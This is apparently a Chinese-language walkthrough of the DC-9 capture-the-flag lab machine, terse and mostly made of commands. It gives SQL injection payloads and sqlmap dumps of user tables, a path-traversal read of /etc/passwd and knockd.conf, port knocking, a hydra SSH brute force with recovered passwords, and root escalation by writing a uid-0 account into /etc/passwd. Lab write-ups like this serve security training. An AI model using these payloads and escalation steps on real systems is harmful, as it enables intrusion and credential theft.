仅供个人娱乐
靶机信息
下载地址:http://www.five86.com/downloads/DC-9.zip
一、主机扫描
二、信息收集
三、漏洞查找和利用
发现search的地方可能有sql注入
1' union select 1,2,3,4,5,6#
-1' union select 1,2,3,4,5,database()--+
-1'union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema = database()#
-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='Users'#
-1' union select 1,2,3,4,5,group_concat(UserID,Username,Password)from Users#
使用sqlmap
sqlmap -r 1.txt --dbs
sqlmap -r 1.txt -D users --tables
sqlmap -r 1.txt -D users -T UserDetails --columns
sqlmap -r 1 .txt -D users -T UserDetails --dump
sqlmap -r 1.txt -D Staff--tables
sqlmap -r 1.txt -D Staff -T Users --columns
sqlmap -r 1.txt -D Staff -T Users -C Password,UserID,Username –-dump
transorbital1
http://192.168.17.136/manage.php?file=../../../../etc/passwd
没有爆破到
信息收集 发现ssh端口为filtered 百度
这个knockd.conf是一种端口试探服务器工具。它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中,也可以直接用nc敲击端口。
http://192.168.17.136/manage.php?file=../../../../etc/knockd.conf
查看该文件,我们需要依次敲击 7469 8475 9842 端口实现敲门操作
nc 192.169.17.136 7469
nc 192.169.17.136 8475
nc 192.169.17.136 9842
或者
nmap -p 7469 192.168.17.136
nmap -p 8475 192.168.17.136
nmap -p 9842 192.168.17.136
nmap -p22 192.168.17.136
hydra -L 1.txt -P 2.txt ssh://192.168.17.136
得到密码
login: chandlerb password: UrAG0D!
login: janitor password: Ilovepeepee
login: joeyt password: Passw0rd
login: fredf password: B4-Tru3-001
登录信息收集
使用find命令找到该文件,查看源代码
find / -name"test.py"2>/dev/null
cat /opt/devstuff/test.py
百度创个账户
openssl passwd -1 -salt au 123456
echo'au:$1$au$yiTIEVOOBr5S6eBjHZluV/:0:0:root:/bin/bash'>> /tmp/au
sudo ./test/tmp/au /etc/passwd然后运行test脚本,切换到au用户,成功得到root权限
su au
123456
